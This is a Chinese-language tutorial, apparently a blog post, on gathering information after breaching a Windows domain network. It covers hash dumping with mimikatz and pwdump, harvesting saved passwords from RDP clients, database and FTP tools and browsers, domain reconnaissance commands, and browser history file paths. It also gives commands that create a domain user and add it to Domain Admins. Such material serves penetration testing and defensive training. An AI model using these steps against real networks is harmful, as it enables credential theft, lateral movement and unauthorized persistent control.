内网渗透之信息收集

信息获取总是第一步执行的操作,利用管理员的疏忽或者内网机器的弱口令来发现更多的信息。
① 可以使用工具pwdump、mimikatz来抓取管理员hash,配合彩虹表或者在线hash破解,获得管理员的明文密码,这个可以作为自己的密码表,在进行内网其他机器的登陆时尝试。
② 查看远程桌面的连接信息,一般通过远程桌面经常连接的机器会在该程序打开时候的下拉菜单中保存,如果管理员选择的是记住密码的话,那么就轻松跳转其他机器。
③ 假如存在数据库管理工具,ftp管理工具等,如Navicat,SecureCRT,flashfxp等,查看是否是保存的密码,尝试登陆。
④ 各款浏览器的保存登陆密码,作为自己的密码表,在进行内网其他机器的登陆时尝试。
⑤ 有无VPN连接信息。

1、获取当前组的计算机名
一般remark有Dc可能是域控
net view
【内网渗透之信息收集】内网渗透之信息收集
文章图片


2、查看所有域
net view /domain
内网渗透之信息收集
文章图片


3、从计算机名获取IP地址
ping -n 1 计算机名 -4
内网渗透之信息收集
文章图片

也可以用脚本批量获取IP

@echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO ( @FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO ( @FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k %%j) ) )

执行命令时候会发送到域控查询,如果渗透的机器不是域用户权限,则会报错
The request will be processed at a domain controller for domain
System error 1326 has occurred.
Logon failure: unknown user name or bad password.

4、查看域中的用户名
net user /domain 域控下执行
内网渗透之信息收集
文章图片


5、查看域中用户的详细信息
net user Administrator /domain
内网渗透之信息收集
文章图片


6、查询域组名称
net group /domain
内网渗透之信息收集
文章图片


7、查询域管理员
net group "Domain Admins" /domain
内网渗透之信息收集
文章图片


8、添加域管理员账号
添加普通域用户
net user lemon iam@L3m0n /add /domain
将普通域用户提升为域管理员
net group "Domain Admins" lemon /add /domain

9、查看当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net config Workstation
内网渗透之信息收集
文章图片


10、查看域控制器
多域控制器的时候,而且只能用在域控制器上
net group "Domain controllers"

11、查询所有计算机名称
net group "Domain Computers" /domain

12、net命令
>1、映射磁盘到本地
net use z: \\dc01\sysvol
>2、查看共享
net view \\192.168.0.1
>3、开启一个共享名为app$,在d:\config
>net share app$=d:\config

13、跟踪路由
tracert 8.8.8.8

14、查看域时间及域服务器的名字
net time /domain
内网渗透之信息收集
文章图片


15、查询域控
net group “Domain Controllers” /domain
内网渗透之信息收集
文章图片


16、获取域控IP
dsquery server
内网渗透之信息收集
文章图片


17、查看安装的软件版本
powershell命令
Get-WmiObject -class Win32_Product |Select-Object -Property name,version
内网渗透之信息收集
文章图片


18、查看在线用户
query user / qwinsta
内网渗透之信息收集
文章图片


19、查看计算机配置信息
systeminfo
内网渗透之信息收集
文章图片


20、查看补丁安装情况
wmic qfe
内网渗透之信息收集
文章图片


21、查询杀毒软件安装情况
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
内网渗透之信息收集
文章图片


22、获得Windows系统的远程桌面连接历史记录
https://github.com/3gstudent/List-RDP-Connections-History
用powershell运行脚本
根据远程桌面连接历史记录,就能定位出关键的服务器
内网渗透之信息收集
文章图片

内网渗透之信息收集
文章图片


Chrome 历史浏览文件
Chrome 历史浏览文件保存在History文件中,该文件在各大操作系统位置大致如下(参考这里):
Linux
/ home / / .config / google-chrome / Default / History
Mac
/ Users / / Library / Application Support / Google / Chrome / Default / History
Windows XP
C:\ Documents and Settings \ \ Local Settings \ Application Data \ Google \ Chrome \ User Data \ Default \ History
Windows Vista 以及之后的版本
C:\ Users\ \ AppData \ Local \ Google \ Chrome \ User Data \ Default \ History

Firefox 历史浏览文件
Firefox 历史浏览文件保存在places.sqlite文件中,该文件在各大操作系统位置大致如下(参考这里):
Linux
/ home / /.mozilla / firefox / <配置文件文件夹> / places.sqlite
Mac
/ Users / / Application Support / Firefox / Profiles / <配置文件文件夹> / places.sqlite
/ Users / / Library / Mozilla / Firefox / Profiles / <配置文件文件夹> / places.sqlite
Windows XP、2000
C:\ Documents and Settings \ \ Application Data \ Mozilla \ Firefox \ Profiles \ <配置文件文件夹> \places.sqlite
Windows Vista 及更高的版本
C:\ Users \ \ AppData \ Roaming \ Mozilla \ Firefox \ Profiles \ <配置文件文件夹> \ places.sqlite

    推荐阅读